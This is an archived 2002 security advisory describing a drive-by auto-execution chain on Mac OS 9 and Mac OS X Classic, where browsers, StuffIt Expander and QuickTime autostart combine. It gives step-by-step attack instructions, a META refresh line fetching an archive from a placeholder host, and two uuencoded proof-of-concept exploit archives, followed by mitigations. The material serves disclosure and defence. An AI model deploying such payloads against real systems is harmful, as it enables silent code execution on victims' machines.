Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Macintosh :: mac5148.htm

MacOS/MacOSX Classic Environment Arbitrary File Executions



28th Feb 2002

COMMAND

	Arbitrary file executions

SYSTEMS AFFECTED
		
	Mac OS and Mac OS X with Classic Environment
	

	 Details :

	 =======

	 

	 MacOS 9.x, and Mac OS X with Classic environment*1

	 (probably System 7.5.x or higher)

	 Quick Time 2.0 or higher version (probably)*2

	 Stuffit Expander 5.x or higher version for Mac OS

	 Stuffit Expande 6.5 or higher versionr for Mac OS X*3

	 All browser and network-client using Stuffit Expander in

	 post-process for download*4

	  *1: using Mac OS X by oneself is not affected.

	  *2: "Autostart CD-ROMs" is supported since QuickTime 2.0.

	  *3: Stuffit Expander 6.0 for X is not affected.

	  *4: Netscape 6.x and Mozilla shows dialog before download.

	  *4: OmniWeb 4.1beta11 is vulnerable, but 4.0.6 is not.

	  *4: We've tested Fetch 3.0.3, NetFinder v2.3.1, Vicomsoft FTP

	      Client 3.0.1. These are vulnerable.

PROBLEM

	vm_converter     <vm_converter@mac.com>     and      FUJII      Taiyo
	<taiyo@vinet.or.jp>,           in           their            advisory
	[http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html] :
	

	If victims only browse malicious web-page :
	

	1.Browsers start automatically download a compressed disc-image file

	  which includes malicious program.

	

	2.Archivers --such like Stuffit Expander-- automatically expand the

	  compressed file, and mount the disc-image.

	

	3.Mac OS (QuickTime) executes the malicious program included in the

	  disc-image. It depends on QuickTime settings.

	

	These 3 processes are done full-automatically, and end in an instant.
	

	This vulnerability is based on 3 vulnerabilities, and  is  generated  by
	many software's complex relations.  To  explain  the  vulnerability,  we
	summarize these 3 vulnerabilities below.
	

	

	 Vuln.1 (already announced at Bugtraq)

	

	"Macinosh IE file execuion  vulerability"  [BugTraq]  2002  Jan.22  from
	Jass Seljamaa. He reports the vulnerable systems are "IE  5.0,  probably
	earlier, on Classic systems(below OS X)" in  this  contribute,  however,
	the vulnerable system which we found are :
	 

	 Microsoft Internet Explorer 5.0 through 5.1.3

	 iCab Pre 2.7 and 2.7.1

	

	This means, malicious users can  execute  local  programs  in  Macintosh
	using web pages. But it's able to only execute programs  exist  in  full
	file-path in Macintosh which known by a malicious users.
	

	

	 Vuln.2 (probably announced in Japan only)

	

	Next day to Vuln.1 is reported,  a  Japanese  user,  Mr.  Mori  presents
	other vulnerability related to Vuln.1 at "Security Hole  memo"  (written
	in Japanese).
	

	http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie

	

	

	This vulnerability, similar to Vuln.1, is observed when  the  web  pages
	in which META-tag mentioned below is used are browsed.
	

	   <META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/

	    some.sit">

	

	Ater  these  pages  are  browsed,  malicious  programs  are   downloaded
	automatically. So, malicious users use combination of Vuln. 1 and  Vuln.
	2 can force victims to download the program  and  execute  it.  But,  to
	force to execute the program, the malicious users  must  know  the  full
	file-path  of  download  folders  in  victims'   Macintosh.   Vulnerable
	browsers (in our test) :
	

	 Microsoft Internet Explorer 4.5 through 5.1.3

	 Netscape Communicator 4.78

	 Netscape 6.2*1

	 Mozilla 0.9.7*1

	 iCab Pre 2.7 and 2.7.1

	 Opera 5.0

	 OmniWeb 4.0.6 and 4.1beta11

	 *1: Netscape 6.2 and Mozilla shows dialog before download.

	

	

	 Vuln. 3 (we found, probably announced in Japan only)

	 

	According to Vuln.1 and  2,  we  found  other  vulnerability,  malicious
	users can launch arbitrary programs without to know full file-path.
	

	     Step 1 : Make a disk image that contains malicious program.

	     Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin

	              also effective)

	     Step 3 : Upload this *.sit file to some website and prepare a web

	              page using Vuln.1 and 2

	     Step 4 : Victims browse the web page the *.sit file is downloaded

	              automatically.*

	     Step 5 : Stuffit Expander automatically extracts the *.sit file and

	              mounts the disk image.

	     Step 6 : The malicious program in the disk image is executed

	              automatically by browsers.*

	     *Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.

	

	Because of using disk image, malicious users are free  to  file-path  of
	download folder. It's necessary to only prepare malicious  programs  and
	web pages. In this vulnerability, Stuffit Expander  plays  an  important
	role. It does automatic extraction and auto-mount disk  images.  So,  in
	consists of Vuln.1, browsers execute  the  program.  vulnerable  systems
	(in our test) :
	

	 Stuffit Expander 5.x through 6.5.1 for Mac OS

	 Stuffit Expander 6.5 or higher version for Mac OS X*1

	 Microsoft Internet Explorer 5.0 through 5.1.3

	 iCab Pre 2.7 and 2.7.1

	 *1: Stuffit Expander 6.0 for X is not affected.

	

	We make a test page for this vulnerability. Please try it.
	

	http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/

	

	

	

	----------------------------------------------------------------------

	Auto file execution vulnerability in Mac OS

	----------------------------------------------------------------------

	

	According to Vuln.1 to Vuln.3,  we  explain  the  "Auto  file  execution
	vulnerability in Mac OS". This vulnerability which we found uses  Vuln.2
	and 3 but Vuln.1. It is coused by  many  software's  complex  relations,
	such  as  browsers  (and  network-clients)  and  Stuffit  Expander   and
	QuickTime.  It's   like   the   computer-virus   "AutoStart9805"   using
	"Autostart CD-ROMs" of  QuickTime.  In  this  way,  similar  to  Vuln.3,
	malicious users can launch  arbitrary  programs  without  to  know  full
	file-path.
	

	   Step 1 : Make a disk image that contains "autostart" malicious

	            program.

	   Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin

	            also effective)

	   Step 3 : Upload this *.sit file to some website and prepare a web

	            page using Vuln. 2.

	   Step 4 and 5 is same as Vuln. 3.

	   Step 6 : The program in the image is executed automatically by

	            "Autostart CD-ROMs" of QuickTime.

	

	In this vulnerability,
	

	   1. browser downloads the *.sit in consists of Vuln.2.

	   2. then, Stuffit Expander does automatic extraction and auto-mount the

	      disk image.

	   3. and then, QuickTime executes the program in the image.

	

	These are initial settings of each one. It's a teamwork. Only needs  one
	click in  web  page,  It  will  start  automatic  download,  extraction,
	mounting, and  execution.  Furthermore,  if  victims  manually  download
	malicious disk image with browsers or other network clients (like  Fetch
	via FTP), automatic extraction, mounting, execution will start.
	

	 uuEncode Exploit :

	 ================

	

	From [http://www.u-struct.com/diary/img/20020131_OSissue_E/] :
	

	When  your  conditions  are   fulfilled,   "Exploit_HD_OSX.img.sit"   is
	downloaded and extracted, and disk image  "Exploit_HD_OSX"  is  mounted,
	and application "openTrash" is launched  automatically.  "openTrash"  is
	application that prompt "This application opens  trash  only"  and  open
	trash only.
	

	

	begin 644 bad.zip

	M4$L#!!0````(`-IE7"R\5S"+.@(``!$%```'````8F%D+FAT;:U436_:0!"]

	M1^(_C#BT4A1L2'M*C"4"ED`*N`E.FIZBQ1[C5=:[[G[$X=]W%QM("U*DMI?]

	MFITW;][,;C!-YK=AYRR81J.)F^=1,H)IDGSK17</L\=A5V(N415=&,>+)%HD

	MP^[@^N'^=EAH75WY?EW7GNDI+4VJO524?D:)W/BT7/N7_?YE?_!E\!POJ5(&

	M_>BM8H+JY^G$'CUY]HZGJ.ZZL/XN_DT\^6%GZ)QUSKX7R&$CC(14\(QJ*K@"

	M(A%RPW+*&&87\.FG$?KZ-')C`ZH@$S5G@F28`>$9X)N6)-7.WVTSJEZ`EF2-

	M)^$.,*4P?.]%JHK1E#A6K9NHD">2J.+@P8CA:>'"&BU*>SDEC&T\EUU0?`T?

	M#>,HR8KANQ0#WUJV-U;AC,.<I!`OX2KP5TX@P]S(:-@$N3,T?4EHB:!0:\K7

	M;6P+IZ5@4!&.#,*6X<BR4)I(#>-)[SZ>JP/3>.$%*]EB+[7)<ZK!"F%316D!

	M*ML(*)&GJ.QNLI=,[<'G3IW&,MM:_A:\,=A<]M!CFPWE!D$+6SQG;;&/P".2

	M%G`C1:U0.BQT^P.\/=GUPDXP,,J-1ZPHA\J*U:NDL+34O\6P-!O&R%VUFW6+

	MZ&]+^D>YGZ"FNH`Q(TK1%)"_4BEXB5;AHTYH+WW>Q?@_/1&VVIX?$H]UX3)V

	M3U`1"T^44ZEAW.IS_G&G49XSXX3*?LOQ(_H>+,4%U.Y/.*6*!>9"PTJ([0O=

	MR]B>DSQ']^*]=X*[9?O?V`^H^0A_`5!+`0(6"Q0````(`-IE7"R\5S"+.@(`

	M`!$%```'``````````$`(`"`@0````!B860N:'1M4$L%!@`````!``$`-0``

	'`%\"````````

	`

	end

	682 bytes

	

	

	

	begin 644 Exploit_HD_OSX.img.zip

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

	MCP8<```&'```%@```````````"``@($`````17AP;&]I=%](1%]/4U@N:6UG

	:+G-I=%!+!08``````0`!`$0````Z'```````

	`

	end

	7316 bytes

	

SOLUTION
		
	Change the initial settings of each ones below.
	

	In Mac OS : required settings
	

	   - "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off.

	   - Stuffit Expander > preferences > Disk images > "Mount Disk Images"

	      > turn off.

	   - Change the initial Volume name (ex. Macintosh HD) to other.

	   - Change the initial "Download Folder" (ex. Desktop Folder) of

	     browsers to other.

	

	more secure settings (not required)
	

	   - Stuffit Expander > preferences > Expanding > "Continue to expand"

	      > turn off.

	   - Each Browsers and network-clients > each preference > change

	     download setting using Stuffit Expander in post-process to "save

	     to file"

	   - Each Browsers > each preference > change download settings to

	     "disable" *

	    * such as in Internet Explorer, set the "Security Zones" to "high"

	       or "custom" (File downloads to "Disable").

	

	

	In Mac OS X with Classic environment :
	

	  - Classic's "QuickTime setting" control panel > "Autostart CD-ROMs"

	    > turn off.*

	  - Others are same as in Mac OS.

	   * "Autostart CD-ROMs" is influenced with Classic's "QuickTime

	       setting". So, when Classic environment is not booted, Mac OS X is

	       not affected.

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH